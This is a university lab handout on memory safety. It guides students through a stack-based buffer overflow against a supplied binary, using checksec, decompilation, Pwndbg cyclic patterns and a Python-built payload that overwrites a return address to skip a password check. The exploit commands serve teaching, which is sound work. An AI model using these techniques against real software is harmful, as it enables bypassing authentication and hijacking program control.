Guided Example

Stack smashing is a type of buffer overflow attack in which an attacker overwrites part of a program's call stack, typically by overflowing a buffer stored on it. In doing so, the attacker can corrupt a return address on the stack and hijack the program's control flow, e.g. to bypass a security check, spawn a shell, or more generally execute malicious code. A classic explanation of the stack smashing attack can be found in Aleph One’s seminal Phrack article: Smashing The Stack For Fun And Profit.

To demonstrate stack smashing, we assume the following scenario. We consider a program containing a security check (e.g. password or license key verification). We (the attacker) do not know the secret that would let us pass the check legitimately, and there is no simple way to extract it as we did in lab 1. Hence, our goal is to bypass the security check by taking over the program's execution flow. The program is distributed in binary form, and we do not have access to its source code.

Getting and Running the Target Binary

Download this binary. After the download you may need to make it executable with chmod +x smashme01. This program contains a password check. The user enters their password attempt as a command line parameter:

./smashme01
usage: ./smashme01 <password>

./smashme01 test
Authentication failed

Analysing the Target Binary with `checksec`

Let's start by analysing the program with checksec, which is a command-line tool that inspects compiled binaries to display their security-related properties.

If checksec is not already on your machine, install it:
mkdir -p ~/Software
wget https://github.com/slimm609/checksec/tarball/main -O ~/Software/checksec.tar.gz
cd ~/Software && tar xf checksec.tar.gz && mv slimm609-checksec-* checksec
echo "alias checksec=~/Software/checksec/checksec.bash" >>  ~/.bashrc
source ~/.bashrc
Adapt these steps to your environment (e.g. you may use a different shell).

checksec --file=smashme01
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH	Symbols		FORTIFY	Fortified	Fortifiable	FILE
Partial RELRO   No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   5 Symbols	  No	0		2		smashme01

This looks promising. Here we can see that:

The stack canary, which is a protection against buffer overflows on the stack, is absent. This means we will be able to exploit such overflows.
Position Independent Executable (PIE) is disabled. This build-time option, when enabled, allows the location where the binary is loaded in the address space to be randomised (i.e. different) each time the program is launched. No randomisation means we will mostly get the same memory layout across executions, which makes the program easier to study.
Symbols are present: symbols are things like function and global variable names. The fact that they are present in the binary means that disassembly/decompilation will be able to do a better job, e.g. break down the code section into functions, identify them by their name, etc.
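
The PIE property reported by checksec can also be cross-checked by hand. The following is a minimal Python sketch, not part of checksec itself: it reads the e_type field of the ELF header, which is ET_EXEC (2) for a fixed-address executable and ET_DYN (3) for a position-independent one. The function name elf_type and the synthetic header used in the example are illustrative assumptions.

```python
import struct

# e_type values defined by the ELF specification
ET_EXEC = 2  # fixed-address executable (No PIE)
ET_DYN = 3   # shared object or position-independent executable

def elf_type(header: bytes) -> int:
    """Return the e_type field from the first 18 bytes of an ELF file."""
    if len(header) < 18 or header[:4] != b"\x7fELF":
        raise ValueError("not an ELF header")
    # e_ident[5] (EI_DATA) gives the byte order: 1 = little-endian, 2 = big-endian
    fmt = "<H" if header[5] == 1 else ">H"
    # e_type is the 2-byte field right after the 16-byte e_ident array
    return struct.unpack_from(fmt, header, 16)[0]

# Synthetic 64-bit little-endian header, for illustration only
fake_header = b"\x7fELF" + bytes([2, 1, 1]) + bytes(9) + struct.pack("<H", ET_EXEC)
print("PIE" if elf_type(fake_header) == ET_DYN else "No PIE")
```

On the real binary, the header bytes could be obtained with open("smashme01", "rb").read(18).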

Disassembling and Decompiling the Target Binary

If we disassemble the program with objdump, we can see that it is made up of a few functions, including:

main
init
validate
do_important_stuff
Other functions whose names cannot be recovered

Let's study a few of these functions in more detail. Decompiling the program (e.g. with RetDec) will allow us to get a better understanding of what they do. Let's start by looking at main. Decompiled by RetDec, it looks like this (you may see different values for the addresses):

// Address range: 0x401a94 - 0x401b21
int main(int argc, char ** argv) {
    int64_t * v1 = (int64_t *)((int64_t)argv + 8); // 0x401add
    init(*v1);
    if ((int32_t)validate(*v1) == 0) {
        // 0x401b0b
        puts("Authentication failed");
    } else {
        // 0x401aff
        do_important_stuff();
    }
    // 0x401b1a
    return 0;
}

We can see that main gets the first command line argument from argv (argv + 8 corresponds to argv[1]), passes it to init, then to validate. If validate returns 0, it prints Authentication failed, else it calls do_important_stuff. Decompiled, do_important_stuff looks like this:

int64_t do_important_stuff(void) {
    // 0x401a06
    puts("Authentication successful");
    // ...
}

Clearly, this function is executed on the code path taken when authentication succeeds: that will be where we want to jump when we hijack the execution flow. Now let's look at validate:

int64_t validate(int64_t str) {
    int64_t result = 0; // 0x4018bc
    if (strlen((char *)str) == 40) {
        // 0x4018c5
        int64_t str2; // bp-152, 0x401885
        function_4016aa(str, &str2);
        result = memcmp(&g1, &str2, 40) == 0;
    }
    // 0x401905
    return result;
}

This function performs a length check on the password attempt (str), then passes it as a parameter to another function (function_4016aa) alongside the address of a local variable str2. The local variable is then compared with memcmp to a global variable g1, and validate returns 0 if the comparison fails (memcmp returned something other than 0), and 1 if it succeeds (memcmp returned 0).

Recall that from how it is called in main, we know that validate returns 0 if the authentication failed, and something else if it succeeded. The validate function presents a structure typical of a hash check: the password attempt str is hashed into str2, and that hash is compared to g1 which is probably the hash of the correct password. We can also conclude that function_4016aa implements the hashing logic.
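
The structure of validate can be summarised by the Python sketch below. It is only an analogy: toy_hash is a hypothetical stand-in (SHA-1 in hexadecimal, chosen here merely because it yields 40 bytes) for the unknown function_4016aa, and STORED_HASH stands in for the global g1, computed from a made-up password.

```python
import hashlib

def toy_hash(attempt: bytes) -> bytes:
    # Hypothetical stand-in for function_4016aa: any function producing 40 bytes would do
    return hashlib.sha1(attempt).hexdigest().encode()

# Stand-in for g1: the stored hash of a made-up 40-character password
CORRECT = b"P" * 40
STORED_HASH = toy_hash(CORRECT)

def validate(attempt: bytes) -> int:
    result = 0
    if len(attempt) == 40:              # strlen(str) == 40
        digest = toy_hash(attempt)      # function_4016aa(str, &str2)
        # memcmp(&g1, &str2, 40) == 0
        result = int(digest == STORED_HASH)
    return result

print(validate(b"test"), validate(b"x" * 40), validate(CORRECT))  # 0 0 1
```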

Although we can extract the hash of the correct password, we won't be able to crack it with a bruteforce or dictionary attack: for this exercise the passwords have been generated to be long and complex enough to be uncrackable in a reasonable time. Moreover, the hashing method seems custom and hard to reverse-engineer (function_4016aa is quite complex). Instead, we are going to attempt to entirely bypass the check, i.e. force the CPU to jump directly to do_important_stuff without calling validate and checking its return value.

Let's now have a look at init:

int64_t init(int64_t str2) {
    // 0x401a6e
    int64_t str; // bp-40, 0x401a6e
    return (int64_t)strcpy((char *)&str, (char *)str2);
}

This function calls strcpy to copy the password attempt coming from the command line (str2) into str, a local buffer located on the stack (bp is the base pointer, which at runtime points to the base of the function's stack frame). That buffer has a fixed size, whereas strcpy keeps copying bytes until it reaches the terminating null byte of the source string, with no bound on the destination. As we can observe, the program makes no attempt to check that str2 fits into that buffer.

To try to trigger the overflow, call the program with an abnormally long string given as password attempt:

./smashme01 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
[1]    20866 segmentation fault  ./smashme01 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Function Calls and the Stack

Recall from the lectures that the machine code generated by the compiler pushes the return address on the stack upon a function call, and pops it then jumps to it when that function returns.

So with our target program, to bypass the validation of the password attempt, our goal will be to overflow the buffer through the strcpy during init's execution, in such a way that the return address is replaced with the address of our target: do_important_stuff.

Doing so, when init returns, the CPU will jump to do_important_stuff, bypassing the password check.
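
The effect of the overflow on the return address can be simulated in a few lines of Python. This is a toy model, not the real process memory: the 32-byte buffer size, the saved base pointer value and the helper names make_frame, fake_strcpy and return_address are assumptions made for illustration.

```python
import struct

BUF_SIZE = 32  # assumed buffer size, for illustration only

def make_frame(saved_rbp: int, ret_addr: int) -> bytearray:
    # Layout from low to high addresses: buffer | saved base pointer | return address
    return bytearray(BUF_SIZE) + bytearray(struct.pack("<QQ", saved_rbp, ret_addr))

def fake_strcpy(frame: bytearray, src: bytes) -> None:
    # Like strcpy: copy everything plus a terminating NUL, with no bounds check
    data = src + b"\x00"
    frame[0:len(data)] = data

def return_address(frame: bytearray) -> int:
    # The return address slot follows the buffer and the 8-byte saved base pointer
    return struct.unpack_from("<Q", frame, BUF_SIZE + 8)[0]

frame = make_frame(saved_rbp=0x7FFFFFFFDB40, ret_addr=0x401AE8)
fake_strcpy(frame, b"xxx")
print(hex(return_address(frame)))   # 0x401ae8: short input, return address untouched

fake_strcpy(frame, b"x" * 44)
print(hex(return_address(frame)))   # 0x78787878: long input reached the return address
```

In the second call, the last four x characters and the terminating NUL land in the return address slot, which is why the real program crashes when given an overly long argument.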

Understanding the Address Space Layout

Attack Payload: Overview

We have control over the data that will be written on the stack through the overflow: indeed, that data comes from the command line argument passed to the program. The question here is what exactly we should pass as the command line parameter so that the address of the function we want to jump to ends up written exactly in the return address slot. This is our payload, and we should determine 1) how long it should be and 2) what it should contain for the attack to succeed. Our payload should be a concatenation of two things:

A certain amount of padding corresponding to the distance between the start of the buffer we overflow and the return address slot on the stack (see diagram above).
The address of do_important_stuff to be written in the return address slot.

Determining the address of do_important_stuff is easy: from our investigation with checksec we know that the program is not a PIE, so the address of do_important_stuff will be the same across invocations of the program. It can be found e.g. in objdump's output:

objdump --disassemble smashme01 | grep do_important_stuff
0000000000401a06 <do_important_stuff>:

Here its address is 0x401a06 (it may be different on your computer).
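
If the address needs to be reused in a script, it can be extracted from the objdump line with a short Python sketch such as the one below. The helper name symbol_address is hypothetical, and the sample line is the output shown above.

```python
import re

def symbol_address(objdump_line: str, name: str) -> int:
    """Parse a line such as '0000000000401a06 <do_important_stuff>:'."""
    pattern = r"^([0-9a-fA-F]+) <" + re.escape(name) + r">:$"
    match = re.match(pattern, objdump_line.strip())
    if match is None:
        raise ValueError(f"no definition of {name} on this line")
    return int(match.group(1), 16)

line = "0000000000401a06 <do_important_stuff>:"
print(hex(symbol_address(line, "do_important_stuff")))  # 0x401a06
```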

To determine how much padding our payload should contain before that address, we need to understand the memory layout of the stack at the time the overflow occurs. To that end we will use GDB and an addon called Pwndbg, which offers a better interface and many helpful features for reverse engineering.

Installing and Running Pwndbg

To install Pwndbg download a release as follows:

mkdir -p ~/Software
cd ~/Software
wget https://github.com/pwndbg/pwndbg/releases/download/2025.04.18/pwndbg_2025.04.18_x86_64-portable.tar.xz
tar xf pwndbg_2025.04.18_x86_64-portable.tar.xz && rm pwndbg_2025.04.18_x86_64-portable.tar.xz
echo "export PATH=\$PATH:~/Software/pwndbg/bin" >> ~/.bashrc
source ~/.bashrc

Pwndbg can then be launched as follows:

pwndbg smashme01
pwndbg>

To explore Pwndbg's interface, place a breakpoint on main and run the program until it is hit:

pwndbg> break main
pwndbg> run
Breakpoint 1, 0x0000000000401a9c in main ()

Once the breakpoint is hit Pwndbg will display a lot more information vs. vanilla GDB. The screen is divided into 4 main blocks:

REGISTERS displays the content of the registers: the general purpose ones RAX to R15, the base pointer RBP, the stack pointer RSP, as well as the instruction pointer RIP.
DISASM displays a disassembly of the machine code, with the next instruction to be executed having its address highlighted in green.
STACK gives the content of the stack, one stack slot per line. The address of each slot is given on the left, and its content on the right. The first line represents the top of the stack; notice that its address is the same as the content of the stack pointer register RSP.
BACKTRACE shows the function call stack: the CPU is currently running code belonging to main, which was called by __libc_start_call_main, which itself was called by __libc_start_main, which was called by _start. These last 3 functions implement the C standard library code that runs before main is invoked.

Pwndbg supports all GDB commands (e.g. break, run, etc.) and provides additional ones. You can explore these commands on this cheat sheet and on the relevant documentation.

Determining the Amount of Padding

Let's start by setting a breakpoint in the function containing the overflow, init, and run the program with a dummy password, xxx.

pwndbg> break init
Breakpoint 1 at 0x401a76
pwndbg> run xxx

When the breakpoint is hit, use the ni command to continue execution until the call to strcpy is highlighted, i.e. right before that call is made:

 ► 0x401a8c <init+30>    call   strcpy@plt                  <strcpy@plt>
        dest: 0x7fffffffdaf0 ◂— 0
        src: 0x7fffffffe00a ◂— 0x474e414c00787878 /* 'xxx' */

Pwndbg is aware of the calling convention and indicates the value of strcpy's parameters:

The source src points to the dummy password attempt we entered, xxx
The destination dest points to the buffer that we are going to overflow, here its value is 0x7fffffffdaf0.

Now, to work out how much padding to include in our payload, we need to know how many bytes separate 0x7fffffffdaf0 from the location of the return address on the stack. The return address is stored right next to the saved base pointer, 8 bytes above the address held in RBP, so we can display it with the following command:

pwndbg> x/gx $rbp+8
0x7fffffffdb18:	0x0000000000401ae8

Remember that the stack grows down: the return address was pushed before the saved base pointer, so it sits at the higher address, RBP + 8. The return address is 0x401ae8 (the location in main at which execution resumes after init returns), and it is stored on the stack at 0x7fffffffdb18. We can now compute the distance between the return address slot 0x7fffffffdb18 and the first byte of the buffer we are going to overflow, 0x7fffffffdaf0. In a separate terminal:

$ python3 -c "print(0x7fffffffdb18 - 0x7fffffffdaf0)"
40

Our payload will then be 40 bytes of padding, followed by the address of do_important_stuff.
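
The same computation can be wrapped in a small Python helper. This is a sketch under the assumption, which holds for the frame observed above, that the return address is stored 8 bytes above the address held in RBP. The function name padding_length is illustrative, and the value 0x7fffffffdb10 used for RBP is inferred from the x/gx output ($rbp+8 is 0x7fffffffdb18).

```python
def padding_length(dest: int, rbp: int) -> int:
    """Bytes between the start of the buffer and the return address slot."""
    ret_slot = rbp + 8  # the saved base pointer occupies [rbp, rbp + 8)
    if dest >= ret_slot:
        raise ValueError("buffer is not below the return address slot")
    return ret_slot - dest

print(padding_length(dest=0x7FFFFFFFDAF0, rbp=0x7FFFFFFFDB10))  # 40
```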

Smashing the Stack

We determined earlier the address of do_important_stuff to be 0x401a06, so the execution of our attack is as follows:

$ ./smashme01 $'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x06\x1a\x40\x00\x00\x00\x00\x00'

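The first 40 characters (each 1 byte) can be anything. Notice how the address we want to jump to is written backwards. This is because x86-64 is little-endian: the least significant byte of a multi-byte value is stored at the lowest memory address. Note that a command line argument is a C string and so effectively ends at the first \x00. The attack still works because strcpy writes a terminating null byte after \x40, and the remaining upper bytes of the original return address (0x0000000000401ae8) are already zero.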
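
The byte order can be checked with Python's struct module. In this small sketch, the '<Q' format packs an unsigned 64-bit integer in little-endian order, which matches the escape sequence used in the command above.

```python
import struct

target = 0x401A06  # address of do_important_stuff found with objdump

encoded = struct.pack("<Q", target)
print(encoded)                                # b'\x06\x1a@\x00\x00\x00\x00\x00'
print(encoded == b"\x06\x1a\x40" + bytes(5))  # True

# Decoding the same bytes as little-endian gives the address back
print(hex(int.from_bytes(encoded, "little")))  # 0x401a06
```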

The program should display the password that you have to submit to validate the exercise.

An Easier Way to Determine Padding Size

Determining the amount of padding manually, as we did, can be quite cumbersome. An easier method, provided by Pwndbg, is to use a cyclic pattern: a long sequence of characters in which no 8-byte chunk appears twice, which we use to overflow the buffer. Looking at which part of that sequence ends up in the return address slot lets Pwndbg easily compute the distance between the start of the buffer and the return address location.

To generate the cyclic pattern, we can use the built-in cyclic function within pwndbg. This is an example for generating 200 bytes of cyclic pattern:

pwndbg> cyclic 200
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa

⚠️ For some reason using cyclic before having run the program in a Pwndbg session at least once leads to problems. Each time you launch Pwndbg make sure to type run at least once before using cyclic.

Your cyclic function may generate a different pattern. Now run the program, pasting the pattern as its command line parameter:

pwndbg> run aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa

Part of this pattern will overwrite the return address, then the CPU will try to jump to the overwritten value. Because it does not correspond to a valid address, the program will crash and Pwndbg will show us where the CPU tried to jump:

 ► 0x401a93 <init+37>    ret                                <0x6161616161616166>

This is the subset of the pattern (in hexadecimal) that overwrote the return address. Pwndbg has a convenient function to locate the offset of that subset from the start of the last pattern generated:

pwndbg> cyclic -l 0x6161616161616166
Finding cyclic pattern of 8 bytes: b'faaaaaaa' (hex: 0x6661616161616161)
Found at offset 40

And there we have it: this is the distance between the start of the overflowed buffer and the return address, i.e. the amount of padding required for our payload.
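
What cyclic -l does can be reproduced by hand. The Python sketch below is not Pwndbg's implementation: make_pattern is a simplified stand-in that only reproduces the first 200 bytes of the pattern shown above (a letter followed by seven 'a' characters, for each letter from a to y), and find_offset is a hypothetical helper.

```python
import string

def make_pattern(length: int = 200) -> bytes:
    # Simplified stand-in: matches the pattern above only for its first 200 bytes
    if length > 200:
        raise ValueError("this simplified pattern is only valid up to 200 bytes")
    chunks = (letter + "a" * 7 for letter in string.ascii_lowercase[:25])
    return "".join(chunks).encode()[:length]

def find_offset(pattern: bytes, value: int) -> int:
    # The value read from the stack is little-endian, so convert it back to bytes
    needle = value.to_bytes(8, "little")
    return pattern.find(needle)

pattern = make_pattern()
print(find_offset(pattern, 0x6161616161616166))  # 40
```

The conversion to little-endian bytes is the step that turns 0x6161616161616166 back into the substring faaaaaaa reported by Pwndbg.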

Quick Payload Generation with Python

Rather than writing the payload manually, a quick and easy way to generate it is with Python, writing the payload to a file:

$ python3 -c "import sys; sys.stdout.buffer.write(b'A'*40 + (0x401a06).to_bytes(8, 'little'))" > input.txt
$ ./smashme01 $(cat input.txt)

Here 40 is the amount of padding added, and 0x401a06 is our jump target.
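
When the payload is passed as a command line argument from a script, null bytes need care: an argument is a C string, so it cannot contain them. The Python sketch below builds the payload without the trailing zero bytes of the address, relying on strcpy's terminating null byte and on the upper bytes of the original return address already being zero. The helper name build_argument is an assumption, and the call that launches the target is left as a comment since it requires the binary.

```python
def build_argument(padding: int, target: int) -> bytes:
    """Padding followed by the little-endian target address, without trailing NULs."""
    address = target.to_bytes(8, "little").rstrip(b"\x00")
    payload = b"A" * padding + address
    if b"\x00" in payload:
        raise ValueError("payload contains a null byte and cannot be passed via argv")
    return payload

payload = build_argument(40, 0x401A06)
print(payload[-3:], len(payload))  # b'\x06\x1a@' 43

# To launch the target with this argument (requires smashme01 in the current directory):
# import subprocess
# subprocess.run([b"./smashme01", payload])
```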

Submission Instructions

Enter the extracted password on the corresponding line of the CSV file in the submission git repository, i.e.:

smashme01,password-here

COMP60261 Lab 2: Memory Safety